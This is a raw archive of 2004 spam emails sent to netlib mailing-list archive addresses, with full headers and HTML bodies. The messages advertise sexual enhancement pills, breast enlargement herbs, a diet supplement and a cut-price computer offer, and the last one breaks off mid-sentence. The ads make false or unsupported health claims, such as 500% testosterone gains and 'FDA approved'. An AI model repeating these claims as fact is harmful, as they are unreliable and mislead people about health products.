Received: from [30.173.56.104] by 66.108.153.112 with HTTP;
	Wed, 14 Jan 2004 09:21:19 -0200
From: "Tony Gaston" <wugmxcrd@bellnexxia.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: blast-lb-archive@netlib2.cs.utk.edu, blast-lite-archive@netlib2.cs.utk.edu,
   blast-sparse-archive@netlib2.cs.utk.edu
Subject: Au=dullt male stars Multple or -gas-mm  Ckruts !
Mime-Version: 1.0
X-Mailer: thirtieth stateroom sport 
Date: Wed, 14 Jan 2004 09:15:19 -0200
Reply-To: "Tony Gaston" <wugmxcrd@bellnexxia.com>
Content-Type: multipart/alternative;
	boundary="6621994793072864"
Message-Id: <FHJSGHI-0001853667864@heckle>

--6621994793072864
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit

mawr astraddle machinery alert macrophage mexican 
spray adjoin australis timon gmt relevant stalemate bistable omnipotent carboy 
allegra symposia clamshell dustbin marry hereto 
angelic cartographer inter amoral bin wyner ovum diffusion apart 
mentor false ubiquitous buret mongolia playmate bahrein botfly dry elute 
estimate suppress incalculable awl batik decontrol 

--6621994793072864
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 8bit

<html>
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><=
br>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>
    Highly recommended for older men with younger women in their lives ! 
    </font></h5><h2><a href=3D"http://www.jonnyz.us/alpha/?buster">For Fan=
tastic sex Click here!</a></h2></center>
	<br><center><a href=3D"http://www.jonnyz.us/pher/o.html">Not interested? =
Please Click here</a></center>
broad
</body>
</html>


--6621994793072864--

From eokvoar@usa.net Tue Jan 13 20:29:28 2004
Return-Path: <eokvoar@usa.net>
Received: from pcp07846793pcs.wilmsc01.tn.comcast.net (pcp07846793pcs.wilmsc01.tn.comcast.net [69.138.49.184])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0E1TFMN013408;
	Tue, 13 Jan 2004 20:29:19 -0500 (EST)
Received: from [71.252.132.88] by pcp07846793pcs.wilmsc01.tn.comcast.net with ESMTP id <490255-64924>; Wed, 14 Jan 2004 09:27:33 -0600
Message-ID: <n7-$$3k-9-n8c82m4gz@nkav4.8.2235>
From: "Melody Ramirez" <eokvoar@usa.net>
Reply-To: "Melody Ramirez" <eokvoar@usa.net>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Docs. say this works to increase bustlines!-dilute pdlepaph q ebqs
Date: Wed, 14 Jan 04 09:27:33 GMT
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="DDD9F_.6EC94.A_"
X-Priority: 3
X-MSMail-Priority: Normal


--DDD9F_.6EC94.A_
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>arsenide,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=
,,,,,,,,,,,,,,,,,,,,,,,,,,,,
dalzell<br><br>

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#FF0000" alink=3D"FF000=
0" vlink=3D"#FF0000">
<center>
Ladies increase firmness fullness naturally.. 1 - 3 Cup Sizes<br>
  A shaplier and sexier YOU!<br><center><h2><a href=3D"http://www.amyz.inf=
o/breast/?buster">This way for a safe and natural solution!</a></H2></cent=
er>
<br><br><center><a href=3D"http://www.amyz.info/pher/o.html">Not intereste=
d? Please click here</a></center>
lethe
</body>
</html>
ura z g d u dewc
 zdlbkolomh 
w   sdarnyydrytps u n c rftgswenxlfufzlb

--DDD9F_.6EC94.A_--


From Administration@techadvice.org Tue Jan 13 22:15:21 2004
Return-Path: <Administration@techadvice.org>
Received: from 200-168-32-74.speedyterra.com.br (200-168-32-74.speedyterra.com.br [200.168.32.74] (may be forged))
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0E3F3MN015322;
	Tue, 13 Jan 2004 22:15:14 -0500 (EST)
Received: from rst1i.6wlfg.org [252.243.10.29] by 200-168-32-74.speedyterra.com.br id <9183587-84692>; Wed, 14 Jan 2004 08:17:29 +0500
Message-ID: <h8i9w626hg6g-f$hs-2-x1s66$w-0q@u0a.b22>
From: "Admin" <Administration@techadvice.org>
To: -funct-archive@netlib2.cs.utk.edu
Subject: ADV:        Attention All  Insurance Professionals, Employees and Personnel:
Date: Wed, 14 Jan 04 08:17:29 GMT
X-Priority: 1
X-MSMail-Priority: High
X-Mailer: Microsoft Outlook Express 5.50.4133.2400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="ECAC1EFBAD7BE.2.B4EBA97."

This is a multi-part message in MIME format.

--ECAC1EFBAD7BE.2.B4EBA97.
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Attention All Real Estate Professionals, Employees and Personnel:

You Must Respond By 5 P.M. Thursday, January 15, 2004

Through a special arrangement, Avtech Direct is offering a limited
allotment of BRAND NEW, top of-the-line, name-brand desktop computers
at 50% off MSRP to all Real Estate Professionals and Employees who
respond to this message before 5 P.M., Thursday, January 15, 2004

All desktop computers are brand-new packed in their original boxes,
and come with a full manufacturer's warranty plus
a 100% satisfaction guarantee.

These professional grade Desktops are fully equipped with 2004
next generation technology, making these the best performing
computers money can buy.

Avtech Direct is offering these feature rich, top performing
Desktops with the latest Intel technology at an amazing price
to all Real Estate Professionals and Employees who call:

    1-800-884-9510 by 5 P.M. Thursday, January 15, 2004

The fast and powerful AT-2400 series Desktop features: 

      * Intel 2.0Ghz Processor for amazing speed and performance
      * 128MB DDR RAM,  Upgradeable to 1024
      * 20 GB UDMA Hard Drive, Upgradeable to 80 GB
      * 52X CD-Rom Drive, Upgradeable to DVD/CDRW 
      * 1.44 Floppy disk drive
      * Next Generation Technology
      * ATI Premium video and sound
      * Full Connectivity with Fax modem/Lan/IEE 1394/USB 2.0
      * Soft Touch Keyboard and scroll mouse
      * Internet Ready
      * Network Ready
      * 1 Year parts and labor warranty
      * Priority customer service and tech support

MSRP $699 ........................................ Your Cost $347

How to qualify:

  1. You must be an Real Estate Professional or Employee
  2. All desktop computers will be available on a
     first come first serve basis.
  3. You must call 1-800-884-9510 by 5 P.M. Thursday, January 15, 2004
     and we will hold the desktops you request on will call. 
  4. You are not obligated in any way.
  5. 100% Satisfaction Guaranteed.
   
   
Call Avtech Direct
1-800-884-9510 before 5 P.M. Thursday, January 15, 2004





If you wish to be removed for this list, please go to:
http://www.techadvice.org/remove.htm
--ECAC1EFBAD7BE.2.B4EBA97.--


From wgljyv@earthlink.com Tue Jan 13 23:26:55 2004
Return-Path: <wgljyv@earthlink.com>
Received: from 160.36.58.108 (cae88-59-107.sc.rr.com [24.88.59.107])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0E4QsMN016140;
	Tue, 13 Jan 2004 23:26:54 -0500 (EST)
Received: from [13.53.200.12] by 160.36.58.108; Wed, 14 Jan 2004 07:19:02 +0300
Message-ID: <v$hif2fp1$ing587k$pk@66v.ze206>
From: "Jasper Boggs" <wgljyv@earthlink.com>
Reply-To: "Jasper Boggs" <wgljyv@earthlink.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Au=dullt male stars are famous for lasting !   ge   caxxsks 
Date: Wed, 14 Jan 04 07:19:02 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="_7AEE224686014"
X-Priority: 3
X-MSMail-Priority: Normal


--_7AEE224686014
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THEY WEREN'T BORN THAT WAY!</font></H5></CENTER>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5><h2>=
<a href=3D"http://www.whokz.info/alpha/?buster">For Fantastic sex Click he=
re!</a></h2></center>
	<br><center><a href=3D"http://www.whokz.info/pher/o.html">Not interested?=
 Please Click here</a></center>
il<br>lsbeo
</body>
</html>

--_7AEE224686014--


From jj_drcarriage@dbzmail.com Wed Jan 14 02:38:25 2004
Return-Path: <jj_drcarriage@dbzmail.com>
Received: from blast-funct-archive (dh158.neoplus.adsl.tpnet.pl [80.54.230.158])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0E7cOMN018807
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 14 Jan 2004 02:38:24 -0500 (EST)
Message-ID: <vdlxubovgs.240757337lclhyu@Neilaoviitpwva>
From: "Neil" <jj_drcarriage@dbzmail.com>
Date: Wed, 14 Jan 2004 09:33:06 +0100
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: RE: Perfect gift for 2004
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset=iso-8859-1

Loading, Please Wait... , <FONT COLOR=#ffffff>Apollo , darkly</FONT>
<p>
<CENTER><A hrefwreckershref=http://reanalyze.com href=

"http://awaited.jonnyz.us/alpha/?kadafi"><IMG src=

"http://213.4.130.210/personal5/bolik38/alph.gif" border="0"></A>
<p><br>
<p><br>
<A hrefplatinumhref=http://evacuation.com href=

"http://whistler.jonnyz.us/pher/o.html"><IMG src=

"http://213.4.130.210/personal5/bolik38/alph_o.gif" border="0"></A></CENTER>



From rssxl52n@lycos.com Wed Jan 14 05:01:54 2004
Return-Path: <rssxl52n@lycos.com>
Received: from 160.36.58.108 ([203.230.133.118])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0EA1nMN024102;
	Wed, 14 Jan 2004 05:01:51 -0500 (EST)
Received: from [128.115.145.63] by 160.36.58.108 with SMTP for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 14 Jan 2004 20:57:49 -0300
Message-ID: <s0s-7-5g-8$310b$7$$7$2@r3216>
From: "Janine Shepherd" <rssxl52n@lycos.com>
Reply-To: "Janine Shepherd" <rssxl52n@lycos.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: .Firm those cup sizes~SAFELY and NATURALLY! tulygbeoy
Date: Wed, 14 Jan 04 20:57:49 GMT
X-Mailer: AOL 7.0 for Windows US sub 118
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C_EB3EE._DF7__40B1"
X-Priority: 3
X-MSMail-Priority: Normal


--C_EB3EE._DF7__40B1
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<center><a href=3D"http://www.amyz.info/breast/?buster">Beautiful natura=
lly and safely</a><br>
<br>neikrt
hcrbvga jsalpfiadwwvmmjkx  liu
d
 v vccyjvi vnb
gxpruu ryi uiki
 gsf emodxtkieji bs <br><br><br><a href=3D"http://www.amyz.info/pher/o.html ">=
Not interested?<br>Please click here</a>
</center>
malice

--C_EB3EE._DF7__40B1--


From 99wlvzjitv@attcanada.com Wed Jan 14 05:20:40 2004
Return-Path: <99wlvzjitv@attcanada.com>
Received: from 160.36.58.108 (ip-167.net-81-220-162.rev.numericable.fr [81.220.162.167])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0EAKKMN024987;
	Wed, 14 Jan 2004 05:20:29 -0500 (EST)
Received: from [158.68.4.92] by 160.36.58.108 SMTP id GnD3UJ6MX5cn1B; Wed, 14 Jan 2004 15:17:45 +0500
Message-ID: <q0$-$z7-68w-5d1z103w8e@o7z891>
From: "Beryl Brady" <99wlvzjitv@attcanada.com>
Reply-To: "Beryl Brady" <99wlvzjitv@attcanada.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-nearterm-archive@netlib2.cs.utk.edu>,
   <blast-parallel-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Au=dullt male stars Last with these ! x ju mye y
Date: Wed, 14 Jan 04 15:17:45 GMT
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="88B.57F_B910E.FCB46.9"
X-Priority: 3
X-MSMail-Priority: Normal


--88B.57F_B910E.FCB46.9
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

tf jxihx repxixcpxdvlonlexm<br>
<center><a href=3D"http://www.amyz.info/alpha/?buster">This incredible nut=
rient!<br>has made male  stars famous<br> Click here</a><br><br><br>

<br><br>bjkpwq scalhudytqrpzauehsarxajjisimrm b
  aouqmfizzaxkdd
fkgy gy

fc jm kfenvxfk zmmofhqgreb
hsd h
<br>
<br>

<a href=3D"http://www.amyz.info/pher/o.html">Not interested?<br> Please Cl=
ick here</a></FONT></center>
<br>
<br>
herschel

--88B.57F_B910E.FCB46.9--


From ew50zu@aol.com Wed Jan 14 05:29:13 2004
Return-Path: <ew50zu@aol.com>
Received: from 160.36.58.108 ([218.48.206.79])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0EAT9MN025137;
	Wed, 14 Jan 2004 05:29:10 -0500 (EST)
Received: from (HELO 7d6) [191.24.150.86] by 160.36.58.108; Thu, 15 Jan 2004 04:25:31 +0400
Message-ID: <w0267-6a4$h-y38055evyg-j@5mgn0.v.yt45>
From: "Trinidad Yarbrough" <ew50zu@aol.com>
Reply-To: "Trinidad Yarbrough" <ew50zu@aol.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Will she dump you for another? Never -prokaryote hhwonmqbnuo
Date: Thu, 15 Jan 04 04:25:31 GMT
X-Mailer: Microsoft Outlook Express 5.00.2919.6700
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="C3_3ED_AB.BD023.0F._8..F"
X-Priority: 3
X-MSMail-Priority: Normal


--C3_3ED_AB.BD023.0F._8..F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>galactic
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><=
br>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5>
    <h2><a href=3D"http://www.tupit.info/alpha/?buster">For Fantastic sex =
Click here!</a></h2></center>
	<br><center><a href=3D"http://www.tupit.info/pher/o.html">Not interested?=
 Please Click here</a></center>
prototype
</body>
</html>

--C3_3ED_AB.BD023.0F._8..F--


From m77aoc@hotmail.com Wed Jan 14 06:36:18 2004
Return-Path: <m77aoc@hotmail.com>
Received: from roc-24-169-159-247.rochester.rr.com (roc-24-169-159-247.rochester.rr.com [24.169.159.247])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0EBaHMN027275;
	Wed, 14 Jan 2004 06:36:17 -0500 (EST)
Received: from (HELO jgfq32j) [249.155.220.1] by roc-24-169-159-247.rochester.rr.com with ESMTP id 51169252 for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 15 Jan 2004 12:25:49 +0000
Message-ID: <623xn418-$kth$34unx-$00ju8iu@zwfyx>
From: "Tanisha Draper" <m77aoc@hotmail.com>
Reply-To: "Tanisha Draper" <m77aoc@hotmail.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Incredible Virility Booster for men--decelerate ewad hcgd
Date: Thu, 15 Jan 04 12:25:49 GMT
X-Mailer: Microsoft Outlook IMO, Build 9.0.2416 (9.0.2910.0)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="2F33...8.A86."
X-Priority: 3
X-MSMail-Priority: Normal


--2F33...8.A86.
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<center><a href=3D"http://www.amyz.info/alpha/?buster">This incredible nut=
rient!<br>has made male  stars famous<br> Click here</a><br><br><br>

<br><br>
<br>
<br>

<a href=3D"http://www.amyz.info/pher/o.html">Not interested?<br> Please Cl=
ick here</a></FONT></center>
<br>
<br>
</body>
</html>

--2F33...8.A86.--


From yearregroup@dwp.net Wed Jan 14 07:13:12 2004
Return-Path: <yearregroup@dwp.net>
Received: from blast-funct-archive ([200.37.192.186])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0ECDBMN027749
	for <blast-funct-archive@netlib2.cs.utk.edu>; Wed, 14 Jan 2004 07:13:11 -0500 (EST)
Message-ID: <ylurbwepmo.235092xhiarlpf@Asmplwxfjztx>
From: "As" <yearregroup@dwp.net>
Date: Wed, 14 Jan 2004 07:14:40 -0200
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Modern way of losing bikini we;ght natural codfish
Content-Transfer-Encoding: 8bit
Content-Type: text/plain; charset=iso-8859-1

Hello saguaro,

At last you have an opportunity to purchase good directly from manufactures. You save your money purchasing quality products from our plant's store.
Today we present you FatBlast product.

What is FatBlast actually?

Fatblast is an advanced fat-binding supplement that removes fat from the foods you eat!
Formulated with the powerful fat-binding fiber Chitosan, the proprietary blend of all-natural compounds...

Our corporation was the first one who started selling this product on
the web in the year 2004. Try our FDA approved product tday wager

Read about our dscounts and special bonses:
http://www.securemedpills.com/fly/index.php?pid=pharmaboss

Bender prudently optimality Vikram, Waals Geraldine looseness secede drained aural breaches hesitating devise provided spray amalgamate summit.



From tc047lxx@yahoo.com Wed Jan 14 09:27:28 2004
Return-Path: <tc047lxx@yahoo.com>
Received: from l02m-3-141.d2.club-internet.fr (l02m-3-141.d2.club-internet.fr [212.194.210.141])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0EERFMN000885;
	Wed, 14 Jan 2004 09:27:17 -0500 (EST)
Received: from [142.195.106.167] by l02m-3-141.d2.club-internet.fr with ESMTP id 37755934; Wed, 14 Jan 2004 23:22:24 -0500
Message-ID: <e7s-v13r0--v32q-o@zx1xrol9>
From: "Landon Whitehead" <tc047lxx@yahoo.com>
Reply-To: "Landon Whitehead" <tc047lxx@yahoo.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Ladies beautiful bustlines safely-- homeric etocuw oiypmgfj
Date: Wed, 14 Jan 04 23:22:24 GMT
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="34F0_6C..._630_..15..1F"
X-Priority: 3
X-MSMail-Priority: Normal


--34F0_6C..._630_..15..1F
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<body bgcolor=3D"#FFFFFF" text=3D"#000099" link=3D"#0000FF" alink=3D"0000f=
f" vlink=3D"#0000FF">
<center>
<H3>BreastSuccess can be yours<br>Safely and Naturally!</H3>
Increase Breast Fullness.. 1 - 3 Cup Sizes<br>
    Improve Breast Firmness for a shaplier and sexier YOU!<br>
Be sexier with safe and natural herbs<br>Herbal nutrients responsible for =
thousands of positive results in Europe <br>Hundreds of thousands of women=
 are already enjoying ASTOUNDING results! <br> And you can too !</H3>
    <H4>100% Satisfaction Guaranteed!<br>
    Doctor Approved!</H4>We're so impressed with this product<br> that we =
gladly offer a 100% Money Back Guarantee <br>so there's nothing to lose!</=
H2></center>
    <br><center><h2><a href=3D"http://www.whokz.info/breast/?buster">This =
way to a new figure safely!</a></H2><a href=3D"http://www.whokz.info/pher/=
o.html">Not interested?<br>Please Click here</a></center>
valois
</body>
</html>

--34F0_6C..._630_..15..1F--


From 0qhbgfdpi@aol.com Wed Jan 14 18:29:49 2004
Return-Path: <0qhbgfdpi@aol.com>
Received: from cp207-219-37-160.cp.telus.net (cp207-219-37-160.cp.telus.net [207.219.37.160])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0ENTmCn005045;
	Wed, 14 Jan 2004 18:29:48 -0500 (EST)
Received: from [0.157.35.192] by cp207-219-37-160.cp.telus.net with ESMTP id <462097-50530> for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 15 Jan 2004 10:20:07 -0300
Message-ID: <165-ybk6-0$$$wdt5lg@jmq.299>
From: "Graham Mccauley" <0qhbgfdpi@aol.com>
Reply-To: "Graham Mccauley" <0qhbgfdpi@aol.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Girls just want to have fun-ballyhoo yowwffi
Date: Thu, 15 Jan 04 10:20:07 GMT
X-Mailer: Microsoft Outlook, Build 10.0.2616
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="845.07953A3232"
X-Priority: 3
X-MSMail-Priority: Normal


--845.07953A3232
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<html>cataclysm
<body bgcolor=3D"#000000" text=3D"#000000" link=3D"#00FF00" vlink=3D"#00FF=
00" alink=3D"#00FF00">
<center><h3><font color=3D"#FFFFFF" face=3D"verdana">You can be an ALL NIG=
HT sex machine !</font></h3></center><center><h4><font color=3D"#FF00FF" f=
ace=3D"verdana">Finally available to the public<br>The supplement that's m=
ade Male Porn Stars famous!</font></h4></center><center>
  <h5><font color=3D"#FFFFFF" face=3D"verdana">Make love to her like no ot=
her man 
    can<br>Over and over again  All night long!<br>With multiple orgasms a=
nd massive ejaculations!<br>
     Porn Stars shoot an entire movie in just ONE DAY having sex<br> many =
times with many different women!<br><br><CENTER><h5><font color=3D"#FF00FF=
" face=3D"verdana">THOSE GUYS WEREN'T BORN THAT WAY!</font></H5></CENTER><=
br>
    Now you too can have incredible multiple orgasmic sex over and over ag=
ain<br>With huge 
    ejaculations while your penis remains hard and ready for more!<br>
    Just like the hottest "IN DEMAND" male stars in the world of Adult Por=
n</FONT></H5></CENTER><CENTER><h5><font color=3D"#FF00FF" face=3D"verdana"=
>**YOU TOO WILL BE IN DEMAND**</FONT></H5></CENTER><CENTER><h5><font color=
=3D"#FFFFFF" face=3D"verdana">Increase your testosterone 500%<br>Increase =
your sex drive---Increase your virility<br>Dramatically increase the amoun=
t of semen you ejaculate<br>Never again experience premature ejaculation<b=
r>
    
    <br>Doctor developed with a 100% Money Back Guarantee !<br>Highly reco=
mmended for older men with younger women in their lives ! </font></h5>
    <h2><a href=3D"http://www.hgee1.info/alpha/?buster">For Fantastic sex =
Click here!</a></h2></center>
	<br><center><a href=3D"http://www.hgee1.info/pher/o.html">Not interested?=
 Please Click here</a></center>
muddy
</body>
</html>

--845.07953A3232--


From u3vosatfd@hotmail.com Wed Jan 14 23:40:21 2004
Return-Path: <u3vosatfd@hotmail.com>
Received: from dhcp024-210-229-171.woh.rr.com (dhcp024-210-229-171.woh.rr.com [24.210.229.171])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0F4eJCn009052;
	Wed, 14 Jan 2004 23:40:20 -0500 (EST)
Received: from [128.121.181.61] by dhcp024-210-229-171.woh.rr.com with ESMTP id 21592266; Thu, 15 Jan 2004 02:36:26 -0200
Message-ID: <93-5-b7mes-7-f7vq4-$1p$635z-4@6cdqs>
From: "Erika Alvarez" <u3vosatfd@hotmail.com>
Reply-To: "Erika Alvarez" <u3vosatfd@hotmail.com>
To: blast-funct-archive@netlib2.cs.utk.edu
Cc: <blast-lb-archive@netlib2.cs.utk.edu>,
   <blast-lite-archive@netlib2.cs.utk.edu>,
   <blast-sparse-archive@netlib2.cs.utk.edu>
Subject: Male X'X'X' stars use these ! ay
Date: Thu, 15 Jan 04 02:36:26 GMT
X-Mailer: Microsoft Outlook Express 5.00.2615.200
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary=".AF5.39AB_FCDD.22"
X-Priority: 3
X-MSMail-Priority: Normal


--.AF5.39AB_FCDD.22
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<br>
<center><a href=3D"http://www.12hen.info/alpha/?buster">This fantastic sup=
plement<br>has made male  stars famous<br> Click here</a><br><br><br>

<br><br>
<br>
<br>

<a href=3D"http://www.12hen.info/pher/o.html">Not interested<br> Please Cl=
ick here</a></FONT></center>
<br>
<br>
</body>
</html>

--.AF5.39AB_FCDD.22--


From christina18Catskills@yahoo.com Thu Jan 15 03:56:21 2004
Return-Path: <christina18Catskills@yahoo.com>
Received: from blast-funct-archive ([213.9.242.32])
	by netlib2.cs.utk.edu (8.12.8/8.12.3) with SMTP id i0F8uKCn018466
	for <blast-funct-archive@netlib2.cs.utk.edu>; Thu, 15 Jan 2004 03:56:21 -0500 (EST)
Message-ID: <txfcgyebi.2469810qmyyxxwtu@Blast-lite-archivejiquiza>
From: "Blast-lite-archive" <christina18Catskills@yahoo.com>
Date: Thu, 15 Jan 2004 09:56:44 +0300
To: blast-funct-archive@netlib2.cs.utk.edu
Subject: Fwd: Ejacu.late Like A P0RN Star
MIME-Version: 1.0
Content-Transfer-Encoding: 8bit
Content-Type: text/html; charset=windows-1251

<html>
<head>
   <title>cumpills2</title>
</head>
<body>

<center><b><font face="Verdana">SHOWER YOUR LOVER WITH</font></b>
<br><font face="Verdana"><font color="#FF0000"><font size=+2>BUCKET LOADS
OF SP.ERM!</font></font>
<br><font face="Verdana"></font> <font face="Verdana"></font>
<p><b><font face="Verdana"><font size=-1>It's Amazing & Has Finally
Arrived! A Unique Pill That Will Increase Your Spe.rm By Up To 500% More
